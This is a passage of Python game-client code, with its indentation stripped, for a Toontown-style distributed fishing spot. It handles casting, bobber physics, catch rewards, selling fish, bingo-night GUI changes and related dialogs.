del self.fsm
if self.nodePath:
self.nodePath.removeNode()
del self.nodePath
DistributedObject.DistributedObject.delete(self)
if self.ripples:
self.ripples.destroy()
def generateInit(self):
DistributedObject.DistributedObject.generateInit(self)
self.nodePath = NodePath(self.uniqueName('FishingSpot'))
self.angleNP = self.nodePath.attachNewNode(self.uniqueName('FishingSpotAngleNP'))
self.collSphere = CollisionSphere(0, 0, 0, self.getSphereRadius())
self.collSphere.setTangible(0)
self.collNode = CollisionNode(self.uniqueName('FishingSpotSphere'))
self.collNode.setCollideMask(ToontownGlobals.WallBitmask)
self.collNode.addSolid(self.collSphere)
self.collNodePath = self.nodePath.attachNewNode(self.collNode)
self.bobStartPos = Point3(0.0, 3.0, 8.5)
def generate(self):
DistributedObject.DistributedObject.generate(self)
def announceGenerate(self):
DistributedObject.DistributedObject.announceGenerate(self)
self.nodePath.reparentTo(self.getParentNodePath())
self.accept(self.uniqueName('enterFishingSpotSphere'), self.__handleEnterSphere)
def setPondDoId(self, pondDoId):
self.pondDoId = pondDoId
if pondDoId in self.cr.doId2do:
self.setPond(self.cr.doId2do[pondDoId])
else:
self.acceptOnce('generate-%d' % pondDoId, self.setPond)
def setPond(self, pond):
self.pond = pond
self.area = self.pond.getArea()
self.waterLevel = FishingTargetGlobals.getWaterLevel(self.area)
def allowedToEnter(self):
if hasattr(base, 'ttAccess') and base.ttAccess and base.ttAccess.canAccess():
return True
return False
def handleOkTeaser(self):
self.dialog.destroy()
del self.dialog
place = base.cr.playGame.getPlace()
if place:
place.fsm.request('walk')
def __handleEnterSphere(self, collEntry):
if self.allowedToEnter():
if base.localAvatar.doId == self.lastAvId and globalClock.getFrameCount() <= self.lastFrame + 1:
self.notify.debug('Ignoring duplicate entry for avatar.')
return
if base.localAvatar.hp > 0 and base.cr.playGame.getPlace().fsm.getCurrentState().getName() != 'fishing':
self.cr.playGame.getPlace().detectedFishingCollision()
self.d_requestEnter()
else:
place = base.cr.playGame.getPlace()
if place:
place.fsm.request('stopped')
self.dialog = TeaserPanel.TeaserPanel(pageName='fishing', doneFunc=self.handleOkTeaser)
def d_requestEnter(self):
self.sendUpdate('requestEnter', [])
def rejectEnter(self):
self.cr.playGame.getPlace().setState('walk')
def d_requestExit(self):
self.sendUpdate('requestExit', [])
def d_doCast(self, power, heading):
self.sendUpdate('doCast', [power, heading])
def getSphereRadius(self):
return 1.5
def getParentNodePath(self):
return render
def setPosHpr(self, x, y, z, h, p, r):
self.nodePath.setPosHpr(x, y, z, h, p, r)
self.angleNP.setH(render, self.nodePath.getH(render))
def setOccupied(self, avId):
if avId and avId not in self.cr.doId2do:
def tryAgain(av):
def reposition(task):
self.setOccupied(avId)
return task.done
taskMgr.doMethodLater(0.1, reposition, self.uniqueName('reposition'))
self.acceptOnce('generate-%d' % avId, tryAgain)
return
if self.av != None:
if not self.av.isEmpty():
self.__dropPole()
self.av.loop('neutral')
self.av.setParent(ToontownGlobals.SPRender)
self.av.startSmooth()
self.ignore(self.av.uniqueName('disable'))
self.__hideBob()
self.fsm.requestFinalState()
self.__removePole()
self.av = None
self.placedAvatar = 0
self.angleNP.setH(render, self.nodePath.getH(render))
self.__hideLine()
wasLocalToon = self.localToonFishing
self.lastAvId = self.avId
self.lastFrame = globalClock.getFrameCount()
self.avId = avId
self.localToonFishing = 0
if self.avId == 0:
self.collSphere.setTangible(0)
else:
self.collSphere.setTangible(1)
if self.avId == base.localAvatar.doId:
base.setCellsActive(base.bottomCells, 0)
self.localToonFishing = 1
if base.wantBingo:
self.pond.setLocalToonSpot(self)
self.av = self.cr.doId2do.get(self.avId)
self.__loadStuff()
self.placedAvatar = 0
self.firstCast = 1
self.acceptOnce(self.av.uniqueName('disable'), self.__avatarGone)
self.av.stopSmooth()
self.av.wrtReparentTo(self.angleNP)
self.av.setAnimState('neutral', 1.0)
self.createCastTrack()
if wasLocalToon and not self.localToonFishing:
self.__hideCastGui()
if base.wantBingo:
self.pond.setLocalToonSpot()
base.setCellsActive([base.bottomCells[1], base.bottomCells[2]], 1)
base.setCellsActive(base.rightCells, 1)
place = base.cr.playGame.getPlace()
if place:
place.setState('walk')
return
def __avatarGone(self):
self.setOccupied(0)
def setMovie(self, mode, code, itemDesc1, itemDesc2, itemDesc3, power, h):
if self.av == None:
return
if mode == FishGlobals.NoMovie:
pass
elif mode == FishGlobals.EnterMovie:
self.fsm.request('waiting')
elif mode == FishGlobals.ExitMovie:
self.fsm.request('leaving')
elif mode == FishGlobals.CastMovie:
if not self.localToonFishing:
self.fsm.request('distCasting', [power, h])
elif mode == FishGlobals.PullInMovie:
self.fsm.request('reward', [code,
itemDesc1,
itemDesc2,
itemDesc3])
return
def getStareAtNodeAndOffset(self):
return (self.nodePath, Point3())
def __loadStuff(self):
rodId = self.av.getFishingRod()
rodPath = FishGlobals.RodFileDict.get(rodId)
if not rodPath:
self.notify.warning('Rod id: %s model not found' % rodId)
rodPath = RodFileDict[0]
self.pole = Actor.Actor()
self.pole.loadModel(rodPath)
self.pole.loadAnims({'cast': 'phase_4/models/props/fishing-pole-chan'})
self.pole.pose('cast', 0)
self.ptop = self.pole.find('**/joint_attachBill')
if self.line == None:
self.line = Rope.Rope(self.uniqueName('Line'))
self.line.setColor(1, 1, 1, 0.4)
self.line.setTransparency(1)
self.lineSphere = BoundingSphere(Point3(-0.6, -2, -5), 5.5)
if self.bob == None:
self.bob = loader.loadModel('phase_4/models/props/fishing_bob')
self.bob.setScale(1.5)
self.ripples = Ripples.Ripples(self.nodePath)
self.ripples.setScale(0.4)
self.ripples.hide()
if self.splashSounds == None:
self.splashSounds = (base.loadSfx('phase_4/audio/sfx/TT_splash1.ogg'), base.loadSfx('phase_4/audio/sfx/TT_splash2.ogg'))
return
def __placeAvatar(self):
if not self.placedAvatar:
self.placedAvatar = 1
self.__holdPole()
self.av.setPosHpr(0, 0, 0, 0, 0, 0)
def __holdPole(self):
if self.poleNode != []:
self.__dropPole()
np = NodePath('pole-holder')
hands = self.av.getRightHands()
for h in hands:
self.poleNode.append(np.instanceTo(h))
self.pole.reparentTo(self.poleNode[0])
def __dropPole(self):
self.__hideBob()
self.__hideLine()
if self.pole != None:
self.pole.clearMat()
self.pole.detachNode()
for pn in self.poleNode:
pn.removeNode()
self.poleNode = []
return
def __removePole(self):
self.pole.cleanup()
self.pole.removeNode()
self.poleNode = []
self.ptop.removeNode()
self.pole = None
self.ptop = None
return
def __showLineWaiting(self):
self.line.setup(4, ((None, (0, 0, 0)),
(None, (0, -2, -4)),
(self.bob, (0, -1, 0)),
(self.bob, (0, 0, 0))))
self.line.ropeNode.setBounds(self.lineSphere)
self.line.reparentTo(self.ptop)
return
def __showLineCasting(self):
self.line.setup(2, ((None, (0, 0, 0)), (self.bob, (0, 0, 0))))
self.line.ropeNode.setBounds(self.lineSphere)
self.line.reparentTo(self.ptop)
return
def __showLineReeling(self):
self.line.setup(2, ((None, (0, 0, 0)), (self.bob, (0, 0, 0))))
self.line.ropeNode.setBounds(self.lineSphere)
self.line.reparentTo(self.ptop)
return
def __hideLine(self):
if self.line:
self.line.detachNode()
def __showBobFloat(self):
self.__hideBob()
self.bob.reparentTo(self.angleNP)
self.ripples.reparentTo(self.angleNP)
self.ripples.setPos(self.bob.getPos())
self.ripples.setZ(self.waterLevel + 0.025)
self.ripples.play()
splashSound = random.choice(self.splashSounds)
base.playSfx(splashSound, volume=0.8, node=self.bob)
self.bobBobTask = taskMgr.add(self.__doBobBob, self.taskName('bob'))
def __hideBob(self):
if self.bob:
self.bob.detachNode()
if self.bobBobTask:
taskMgr.remove(self.bobBobTask)
self.bobBobTask = None
if self.ripples:
self.ripples.stop()
self.ripples.detachNode()
return
def __doBobBob(self, task):
z = math.sin(task.time * 1.8) * 0.08
self.bob.setZ(self.waterLevel + z)
return Task.cont
def __userExit(self, event = None):
if self.localToonFishing:
self.fsm.request('leaving')
self.d_requestExit()
def __sellFish(self, result = None):
if self.localToonFishing:
if result == DGG.DIALOG_OK:
self.sendUpdate('sellFish', [])
for button in self.sellFishDialog.buttonList:
button['state'] = DGG.DISABLED
else:
self.fsm.request('leaving')
self.d_requestExit()
def __sellFishConfirm(self, result = None):
if self.localToonFishing:
self.fsm.request('waiting', [False])
def __showCastGui(self):
self.__hideCastGui()
self.__makeGui()
self.castButton.show()
self.arrow.hide()
self.exitButton.show()
self.timer.show()
self.__updateFishTankGui()
self.castGui.reparentTo(aspect2d)
self.castButton['state'] = DGG.NORMAL
self.jar['text'] = str(self.av.getMoney())
self.accept(localAvatar.uniqueName('moneyChange'), self.__moneyChange)
self.accept(localAvatar.uniqueName('fishTankChange'), self.__updateFishTankGui)
target = base.cr.doFind('DistributedTarget')
if target:
target.hideGui()
if base.wantBingo:
self.__setBingoCastGui()
def requestLocalAdjusting(mouseEvent):
if self.av.isFishTankFull() and self.__allowSellFish():
self.fsm.request('sellFish')
else:
self.fsm.request('localAdjusting')
def requestLocalCasting(mouseEvent):
if not (self.av.isFishTankFull() and self.__allowSellFish()):
self.fsm.request('localCasting')
self.castButton.bind(DGG.B1PRESS, requestLocalAdjusting)
self.castButton.bind(DGG.B3PRESS, requestLocalAdjusting)
self.castButton.bind(DGG.B1RELEASE, requestLocalCasting)
self.castButton.bind(DGG.B3RELEASE, requestLocalCasting)
if self.firstCast and len(self.av.fishCollection) == 0 and len(self.av.fishTank) == 0:
self.__showHowTo(TTLocalizer.FishingHowToFirstTime)
elif base.wantBingo and self.pond.hasPondBingoManager() and not self.av.bFishBingoTutorialDone:
pass
#todo: fix b_setFishBingoTutorialDone crash
#self.__showHowTo(TTLocalizer.FishBingoHelpMain)
#self.av.b_setFishBingoTutorialDone(True)
def __moneyChange(self, money):
self.jar['text'] = str(money)
def __initCastGui(self):
self.timer.countdown(FishGlobals.CastTimeout)
def __showQuestItem(self, itemId):
self.__makeGui()
itemName = Quests.getItemName(itemId)
self.itemLabel['text'] = itemName
self.itemGui.reparentTo(aspect2d)
self.itemPackage.show()
self.itemJellybean.hide()
self.itemBoot.hide()
def __showBootItem(self):
self.__makeGui()
itemName = TTLocalizer.FishingBootItem
self.itemLabel['text'] = itemName
self.itemGui.reparentTo(aspect2d)
self.itemBoot.show()
self.itemJellybean.hide()
self.itemPackage.hide()
def __setItemLabel(self):
if self.pond.hasPondBingoManager():
self.itemLabel['text'] = str(itemName + '\n\n' + 'BINGO WILDCARD')
else:
self.itemLabel['text'] = itemName
def __showJellybeanItem(self, amount):
self.__makeGui()
itemName = TTLocalizer.FishingJellybeanItem % amount
self.itemLabel['text'] = itemName
self.itemGui.reparentTo(aspect2d)
self.jar['text'] = str(self.av.getMoney())
self.itemJellybean.show()
self.itemBoot.hide()
self.itemPackage.hide()
def __showFishItem(self, code, fish):
self.fishPanel = FishPanel.FishPanel(fish)
self.__setFishItemPos()
self.fishPanel.setSwimBounds(-0.3, 0.3, -0.235, 0.25)
self.fishPanel.setSwimColor(1.0, 1.0, 0.74901, 1.0)
self.fishPanel.load()
self.fishPanel.show(code)
self.__updateFishTankGui()
def __setFishItemPos(self):
if base.wantBingo:
if self.pond.hasPondBingoManager():
self.fishPanel.setPos(0.65, 0, 0.4)
else:
self.fishPanel.setPos(0, 0, 0.5)
else:
self.fishPanel.setPos(0, 0, 0.5)
def __updateFishTankGui(self):
fishTank = self.av.getFishTank()
lenFishTank = len(fishTank)
maxFishTank = self.av.getMaxFishTank()
self.bucket['text'] = '%s/%s' % (lenFishTank, maxFishTank)
def __showFailureReason(self, code):
self.__makeGui()
reason = ''
if code == FishGlobals.OverTankLimit:
reason = TTLocalizer.FishingOverTankLimit
self.failureDialog.setMessage(reason)
self.failureDialog.show()
def __showSellFishDialog(self):
self.__makeGui()
self.sellFishDialog.show()
def __hideSellFishDialog(self):
self.__makeGui()
self.sellFishDialog.hide()
def __showSellFishConfirmDialog(self, numFishCaught):
self.__makeGui()
msg = TTLocalizer.STOREOWNER_TROPHY % (numFishCaught, FishGlobals.getTotalNumFish())
self.sellFishConfirmDialog.setMessage(msg)
self.sellFishConfirmDialog.show()
def __hideSellFishConfirmDialog(self):
self.__makeGui()
self.sellFishConfirmDialog.hide()
def __showBroke(self):
self.__makeGui()
self.brokeDialog.show()
self.castButton['state'] = DGG.DISABLED
def __showHowTo(self, message):
self.__makeGui()
self.howToDialog.setMessage(message)
self.howToDialog.show()
def __hideHowTo(self, event = None):
self.__makeGui()
self.howToDialog.hide()
def __showFishTankFull(self):
self.__makeGui()
self.__showFailureReason(FishGlobals.OverTankLimit)
self.castButton['state'] = DGG.DISABLED
def __hideCastGui(self):
target = base.cr.doFind('DistributedTarget')
if target:
target.showGui()
if self.madeGui:
self.timer.hide()
self.castGui.detachNode()
self.itemGui.detachNode()
self.failureDialog.hide()
self.sellFishDialog.hide()
self.sellFishConfirmDialog.hide()
self.brokeDialog.hide()
self.howToDialog.hide()
self.castButton.unbind(DGG.B1PRESS)
self.castButton.unbind(DGG.B3PRESS)
self.castButton.unbind(DGG.B1RELEASE)
self.castButton.unbind(DGG.B3RELEASE)
self.ignore(localAvatar.uniqueName('moneyChange'))
self.ignore(localAvatar.uniqueName('fishTankChange'))
def __itemGuiClose(self):
self.itemGui.detachNode()
def __makeGui(self):
if base.config.GetBool('want-qa-regression', 0):
self.notify.info('QA-REGRESSION: FISHING: ZoneId: %s' % self.pond.getArea())
if self.madeGui:
return
self.timer = ToontownTimer.ToontownTimer()
self.timer.posInTopRightCorner()
self.timer.hide()
self.castGui = loader.loadModel('phase_4/models/gui/fishingGui')
self.castGui.setBin("background", 10)
self.castGui.setScale(0.67)
self.castGui.setPos(0, 1, 0)
for nodeName in ('bucket', 'jar', 'display_bucket', 'display_jar'):
self.castGui.find('**/' + nodeName).reparentTo(self.castGui)
self.exitButton = DirectButton(parent=self.castGui, relief=None, text=('', TTLocalizer.FishingExit, TTLocalizer.FishingExit), text_align=TextNode.ACenter, text_scale=0.1, text_fg=Vec4(1, 1, 1, 1), text_shadow=Vec4(0, 0, 0, 1), text_pos=(0.0, -0.12), pos=(1.75*(4./3.), 0, -1.33), textMayChange=0, image=(self.castGui.find('**/exit_buttonUp'), self.castGui.find('**/exit_buttonDown'), self.castGui.find('**/exit_buttonRollover')), command=self.__userExit)
self.castGui.find('**/exitButton').removeNode()
self.castButton = DirectButton(parent=self.castGui, relief=None, text=TTLocalizer.FishingCast, text_align=TextNode.ACenter, text_scale=(3, 3 * 0.75, 3 * 0.75), text_fg=Vec4(1, 1, 1, 1), text_shadow=Vec4(0, 0, 0, 1), text_pos=(0, -4), image=self.castGui.find('**/castButton'), image0_color=(1, 0, 0, 1), image1_color=(0, 1, 0, 1), image2_color=(1, 1, 0, 1), image3_color=(0.8, 0.5, 0.5, 1), pos=(0, -0.05, -0.666), scale=(0.036, 1, 0.048))
self.castGui.find('**/castButton').removeNode()
self.arrow = self.castGui.find('**/arrow')
self.arrowTip = self.arrow.find('**/arrowTip')
self.arrowTail = self.arrow.find('**/arrowTail')
self.arrow.reparentTo(self.castGui)
self.arrow.setColorScale(0.9, 0.9, 0.1, 0.7)
self.arrow.hide()
self.jar = DirectLabel(parent=self.castGui, relief=None, text=str(self.av.getMoney()), text_scale=0.16, text_fg=(0.95, 0.95, 0, 1), text_font=ToontownGlobals.getSignFont(), pos=(-1.12, 0, -1.3))
self.bucket = DirectLabel(parent=self.castGui, relief=None, text='', text_scale=0.09, text_fg=(0.95, 0.95, 0, 1), text_shadow=(0, 0, 0, 1), pos=(1.14, 0, -1.33))
self.__updateFishTankGui()
self.itemGui = NodePath('itemGui')
self.itemFrame = DirectFrame(parent=self.itemGui, relief=None, geom=DGG.getDefaultDialogGeom(), geom_color=ToontownGlobals.GlobalDialogColor, geom_scale=(1, 1, 0.6), text=TTLocalizer.FishingItemFound, text_pos=(0, 0.2), text_scale=0.08, pos=(0, 0, 0.587))
self.itemLabel = DirectLabel(parent=self.itemFrame, text='', text_scale=0.06, pos=(0, 0, -0.25))
buttons = loader.loadModel('phase_3/models/gui/dialog_box_buttons_gui')
self.itemGuiCloseButton = DirectButton(parent=self.itemFrame, pos=(0.44, 0, -0.24), relief=None, image=(buttons.find('**/CloseBtn_UP'), buttons.find('**/CloseBtn_DN'), buttons.find('**/CloseBtn_Rllvr')), image_scale=(0.7, 1, 0.7), command=self.__itemGuiClose)
buttons.removeNode()
jarGui = loader.loadModel('phase_3.5/models/gui/jar_gui')
bootGui = loader.loadModel('phase_4/models/gui/fishing_boot')
packageGui = loader.loadModel('phase_3.5/models/gui/stickerbook_gui').find('**/package')
self.itemJellybean = DirectFrame(parent=self.itemFrame, relief=None, image=jarGui, scale=0.5)
self.itemBoot = DirectFrame(parent=self.itemFrame, relief=None, image=bootGui, scale=0.2)
self.itemPackage = DirectFrame(parent=self.itemFrame, relief=None, image=packageGui, scale=0.25)
self.itemJellybean.hide()
self.itemBoot.hide()
self.itemPackage.hide()
self.failureDialog = TTDialog.TTGlobalDialog(dialogName=self.uniqueName('failureDialog'), doneEvent=self.uniqueName('failureDialog'), command=self.__userExit, message=TTLocalizer.FishingFailure, style=TTDialog.CancelOnly, cancelButtonText=TTLocalizer.FishingExit)
self.failureDialog.hide()
self.sellFishDialog = TTDialog.TTGlobalDialog(dialogName=self.uniqueName('sellFishDialog'), doneEvent=self.uniqueName('sellFishDialog'), command=self.__sellFish, message=TTLocalizer.FishBingoOfferToSellFish, style=TTDialog.YesNo)
self.sellFishDialog.hide()
self.sellFishConfirmDialog = TTDialog.TTGlobalDialog(dialogName=self.uniqueName('sellFishConfirmDialog'), doneEvent=self.uniqueName('sellFishConfirmDialog'), command=self.__sellFishConfirm, message=TTLocalizer.STOREOWNER_TROPHY, style=TTDialog.Acknowledge)
self.sellFishConfirmDialog.hide()
self.brokeDialog = TTDialog.TTGlobalDialog(dialogName=self.uniqueName('brokeDialog'), doneEvent=self.uniqueName('brokeDialog'), command=self.__userExit, message=TTLocalizer.FishingBroke, style=TTDialog.CancelOnly, cancelButtonText=TTLocalizer.FishingExit)
self.brokeDialog.hide()
self.howToDialog = TTDialog.TTGlobalDialog(dialogName=self.uniqueName('howToDialog'), doneEvent=self.uniqueName('howToDialog'), fadeScreen=0, message=TTLocalizer.FishingHowToFailed, style=TTDialog.Acknowledge)
self.howToDialog['command'] = self.__hideHowTo
self.howToDialog.setPos(-0.3, 0, 0.5)
self.howToDialog.hide()
self.madeGui = 1
return
def __setBingoCastGui(self):
if self.pond.hasPondBingoManager():
self.notify.debug('__setBingoCastGui: Has PondBing Manager %s' % self.pond.getPondBingoManager().getDoId())
bucket = self.castGui.find('**/bucket')
self.castGui.find('**/display_bucket').reparentTo(bucket)
self.bucket.reparentTo(bucket)
jar = self.castGui.find('**/jar')
self.castGui.find('**/display_jar').reparentTo(jar)
self.jar.reparentTo(jar)
base.setCellsActive(base.rightCells, 0)
bucket.setScale(0.9)
bucket.setX(-1.9)
bucket.setZ(-.11)
jar.setScale(0.9)
jar.setX(-.375)
jar.setZ(-.135)
else:
self.notify.debug('__setItemFramePos: Has No Pond Bingo Manager')
bucket = self.castGui.find('**/bucket')
bucket.setScale(1)
bucket.setPos(0, 0, 0)
jar = self.castGui.find('**/jar')
jar.setScale(1)
jar.setPos(0, 0, 0)
def resetCastGui(self):
self.notify.debug('resetCastGui: Bingo Night Ends - resetting Gui')
bucket = self.castGui.find('**/bucket')
jar = self.castGui.find('**/jar')
bucketPosInt = bucket.posInterval(5.0, Point3(0, 0, 0), startPos=bucket.getPos(), blendType='easeInOut')
bucketScaleInt = bucket.scaleInterval(5.0, VBase3(1.0, 1.0, 1.0), startScale=bucket.getScale(), blendType='easeInOut')
bucketTrack = Parallel(bucketPosInt, bucketScaleInt)
jarPosInt = jar.posInterval(5.0, Point3(0, 0, 0), startPos=jar.getPos(), blendType='easeInOut')
jarScaleInt = jar.scaleInterval(5.0, VBase3(1.0, 1.0, 1.0), startScale=jar.getScale(), blendType='easeInOut')
jarTrack = Parallel(jarPosInt, jarScaleInt)
self.guiTrack = Parallel(bucketTrack, jarTrack)
self.guiTrack.start()
def setCastGui(self):
self.notify.debug('setCastGui: Bingo Night Starts - setting Gui')
bucket = self.castGui.find('**/bucket')
self.castGui.find('**/display_bucket').reparentTo(bucket)
self.bucket.reparentTo(bucket)
jar = self.castGui.find('**/jar')
self.castGui.find('**/display_jar').reparentTo(jar)
self.jar.reparentTo(jar)
bucketPosInt = bucket.posInterval(3.0, Point3(-1.9, 0, -.11), startPos=bucket.getPos(), blendType='easeInOut')
bucketScaleInt = bucket.scaleInterval(3.0, VBase3(0.9, 0.9, 0.9), startScale=bucket.getScale(), blendType='easeInOut')
bucketTrack = Parallel(bucketPosInt, bucketScaleInt)
jarPosInt = jar.posInterval(3.0, Point3(-.375, 0, -.135), startPos=jar.getPos(), blendType='easeInOut')
jarScaleInt = jar.scaleInterval(3.0, VBase3(0.9, 0.9, 0.9), startScale=jar.getScale(), blendType='easeInOut')
jarTrack = Parallel(jarPosInt, jarScaleInt)
self.guiTrack = Parallel(bucketTrack, jarTrack)
self.guiTrack.start()
def setJarAmount(self, amount):
if self.madeGui:
money = int(self.jar['text']) + amount
pocketMoney = min(money, self.av.getMaxMoney())
self.jar.setProp('text', str(pocketMoney))
def __unmakeGui(self):
if not self.madeGui:
return
self.timer.destroy()
del self.timer
self.exitButton.destroy()
self.castButton.destroy()
self.jar.destroy()
self.bucket.destroy()
self.itemFrame.destroy()
self.itemGui.removeNode()
self.failureDialog.cleanup()
self.sellFishDialog.cleanup()
self.sellFishConfirmDialog.cleanup()
self.brokeDialog.cleanup()
self.howToDialog.cleanup()
self.castGui.removeNode()
self.madeGui = 0
def localAdjustingCastTask(self, state):
self.getMouse()
deltaX = self.mouseX - self.initMouseX
deltaY = self.mouseY - self.initMouseY
if deltaY >= 0:
if self.power == 0:
self.arrowTail.setScale(0.075, 0.075, 0)
self.arrow.setR(0)
self.castTrack.pause()
return Task.cont
dist = math.sqrt(deltaX * deltaX + deltaY * deltaY)
delta = dist / 0.5
self.power = max(min(abs(delta), 1.0), 0.0)
self.castTrack.setT(0.2 + self.power * 0.7)
angle = rad2Deg(math.atan(deltaX / deltaY))
if self.power < 0.25:
angle = angle * math.pow(self.power * 4, 3)
if delta < 0:
angle += 180
minAngle = -FishGlobals.FishingAngleMax
maxAngle = FishGlobals.FishingAngleMax
if angle < minAngle:
self.arrow.setColorScale(1, 0, 0, 1)
angle = minAngle
elif angle > maxAngle:
self.arrow.setColorScale(1, 0, 0, 1)
angle = maxAngle
else:
self.arrow.setColorScale(1, 1 - math.pow(self.power, 3), 0.1, 0.7)
self.arrowTail.setScale(0.075, 0.075, self.power * 0.2)
self.arrow.setR(angle)
self.angleNP.setH(-angle)
return Task.cont
def localAdjustingCastTaskIndAxes(self, state):
self.getMouse()
deltaX = self.mouseX - self.initMouseX
deltaY = self.mouseY - self.initMouseY
self.power = max(min(abs(deltaY) * 1.5, 1.0), 0.0)
self.castTrack.setT(0.4 + self.power * 0.5)
angle = deltaX * -180.0
self.angleNP.setH(self.startAngleNP - angle)
return Task.cont
def getMouse(self):
if base.mouseWatcherNode.hasMouse():
self.mouseX = base.mouseWatcherNode.getMouseX()
self.mouseY = base.mouseWatcherNode.getMouseY()
else:
self.mouseX = 0
self.mouseY = 0
def createCastTrack(self):
self.castTrack = Sequence(ActorInterval(self.av, 'castlong', playRate=4), ActorInterval(self.av, 'cast', startFrame=20), Func(self.av.loop, 'fish-neutral'))
def startMoveBobTask(self):
self.__showBob()
taskMgr.add(self.moveBobTask, self.taskName('moveBobTask'))
def moveBobTask(self, task):
g = 32.2
t = task.time
vZero = self.power * self.vZeroMax
angle = deg2Rad(self.power * self.angleMax)
deltaY = vZero * math.cos(angle) * t
deltaZ = vZero * math.sin(angle) * t - g * t * t / 2.0
deltaPos = Point3(0, deltaY, deltaZ)
self.bobStartPos = Point3(0.0, 3.0, 8.5)
pos = self.bobStartPos + deltaPos
self.bob.setPos(pos)
if pos[2] < self.waterLevel:
self.fsm.request('fishing')
return Task.done
else:
return Task.cont
def __showBob(self):
self.__hideBob()
self.bob.reparentTo(self.angleNP)
self.bob.setPos(self.ptop, 0, 0, 0)
self.av.update(0)
def hitTarget(self):
self.fsm.request('waitForAI')
def enterOff(self):
pass
def exitOff(self):
pass
def enterWaiting(self, doAnimation = True):
self.av.stopLookAround()
self.__hideLine()
self.track = Parallel()
if doAnimation:
toonTrack = Sequence(Func(self.av.setPlayRate, 1.0, 'run'), Func(self.av.loop, 'run'), LerpPosHprInterval(self.av, 1.0, Point3(0, 0, 0), Point3(0, 0, 0)), Func(self.__placeAvatar), Parallel(ActorInterval(self.av, 'pole'), Func(self.pole.pose, 'cast', 0), LerpScaleInterval(self.pole, duration=0.5, scale=1.0, startScale=0.01)), Func(self.av.loop, 'pole-neutral'))
if self.localToonFishing:
camera.wrtReparentTo(render)
self.track.append(LerpPosHprInterval(nodePath=camera, other=self.av, duration=1.5, pos=Point3(0, -12, 15), hpr=VBase3(0, -38, 0), blendType='easeInOut'))
toonTrack.append(Func(self.__showCastGui))
toonTrack.append(Func(self.__initCastGui))
if base.wantBingo:
self.__appendBingoMethod(toonTrack, self.pond.showBingoGui)
self.track.append(toonTrack)
else:
self.__showCastGui()
self.track.start()
def __appendBingoMethod(self, interval, callback):
interval.append(Func(callback))
def exitWaiting(self):
self.track.finish()
self.track = None
return
def enterLocalAdjusting(self, guiEvent = None):
if self.track:
self.track.pause()
if self.castTrack:
self.castTrack.pause()
self.power = 0.0
self.firstCast = 0
self.castButton['image0_color'] = Vec4(0, 1, 0, 1)
self.castButton['text'] = ''
self.av.stopLookAround()
self.__hideLine()
self.__hideBob()
self.howToDialog.hide()
castCost = FishGlobals.getCastCost(self.av.getFishingRod())
if self.av.getMoney() < castCost:
self.__hideCastGui()
self.__showBroke()
self.av.loop('pole-neutral')
return
if self.av.isFishTankFull():
self.__hideCastGui()
self.__showFishTankFull()
self.av.loop('pole-neutral')
return
self.arrow.show()
self.arrow.setColorScale(1, 1, 0, 0.7)
self.startAngleNP = self.angleNP.getH()
self.getMouse()
self.initMouseX = self.mouseX
self.initMouseY = self.mouseY
self.__hideBob()
if config.GetBool('fishing-independent-axes', 0):
taskMgr.add(self.localAdjustingCastTaskIndAxes, self.taskName('adjustCastTask'))
else:
taskMgr.add(self.localAdjustingCastTask, self.taskName('adjustCastTask'))
if base.wantBingo:
bingoMgr = self.pond.getPondBingoManager()
if bingoMgr:
bingoMgr.castingStarted()
def exitLocalAdjusting(self):
taskMgr.remove(self.taskName('adjustCastTask'))
self.castButton['image0_color'] = Vec4(1, 0, 0, 1)
self.castButton['text'] = TTLocalizer.FishingCast
self.arrow.hide()
def enterLocalCasting(self):
if self.power == 0.0 and len(self.av.fishCollection) == 0:
self.__showHowTo(TTLocalizer.FishingHowToFailed)
if self.castTrack:
self.castTrack.pause()
self.av.loop('pole-neutral')
self.track = None
return
castCost = FishGlobals.getCastCost(self.av.getFishingRod())
self.jar['text'] = str(max(self.av.getMoney() - castCost, 0))
if not self.castTrack:
self.createCastTrack()
self.castTrack.pause()
startT = 0.7 + (1 - self.power) * 0.3
self.castTrack.start(startT)
self.track = Sequence(Wait(1.2 - startT), Func(self.startMoveBobTask), Func(self.__showLineCasting))
self.track.start()
heading = self.angleNP.getH()
self.d_doCast(self.power, heading)
self.timer.countdown(FishGlobals.CastTimeout)
return
def exitLocalCasting(self):
taskMgr.remove(self.taskName('moveBobTask'))
if self.track:
self.track.pause()
self.track = None
if self.castTrack:
self.castTrack.pause()
self.__hideLine()
self.__hideBob()
return
def enterDistCasting(self, power, h):
self.av.stopLookAround()
self.__placeAvatar()
self.__hideLine()
self.__hideBob()
self.angleNP.setH(h)
self.power = power
self.track = Parallel(Sequence(ActorInterval(self.av, 'cast'), Func(self.pole.pose, 'cast', 0), Func(self.av.loop, 'fish-neutral')), Sequence(Wait(1.0), Func(self.startMoveBobTask), Func(self.__showLineCasting)))
self.track.start()
def exitDistCasting(self):
self.track.finish()
self.track = None
taskMgr.remove(self.taskName('moveBobTask'))
self.__hideLine()
self.__hideBob()
return
def enterFishing(self):
if self.localToonFishing:
self.track = Sequence(ActorInterval(self.av, 'cast'), Func(self.pole.pose, 'cast', 0), Func(self.av.loop, 'fish-neutral'))
self.track.start(self.castTrack.getT())
else:
self.track = None
self.av.loop('fish-neutral')
self.__showBobFloat()
self.__showLineWaiting()
if self.localToonFishing:
self.pond.startCheckingTargets(self, self.bob.getPos(render))
return
def exitFishing(self):
if self.localToonFishing:
self.pond.stopCheckingTargets()
if self.track:
self.track.finish()
self.track = None
return
def enterWaitForAI(self):
self.castButton['state'] = DGG.DISABLED
def exitWaitForAI(self):
self.castButton['state'] = DGG.NORMAL
def enterReward(self, code, itemDesc1, itemDesc2, itemDesc3):
self.__placeAvatar()
self.bob.reparentTo(self.angleNP)
self.waterLevel = FishingTargetGlobals.getWaterLevel(self.area)
self.bob.setZ(self.waterLevel)
self.__showLineReeling()
self.castTrack.pause()
if self.localToonFishing:
self.__showCastGui()
if code == FishGlobals.QuestItem:
self.__showQuestItem(itemDesc1)
elif code in (FishGlobals.FishItem, FishGlobals.FishItemNewEntry, FishGlobals.FishItemNewRecord):
genus, species, weight = itemDesc1, itemDesc2, itemDesc3
fish = FishBase.FishBase(genus, species, weight)
self.__showFishItem(code, fish)
if base.wantBingo:
self.pond.handleBingoCatch((genus, species))
elif code == FishGlobals.BootItem:
self.__showBootItem()
if base.wantBingo:
self.pond.handleBingoCatch(FishGlobals.BingoBoot)
elif code == FishGlobals.JellybeanItem:
amount = itemDesc1
self.__showJellybeanItem(amount)
elif code == FishGlobals.OverTankLimit:
self.__hideCastGui()
else:
self.__showFailureReason(code)
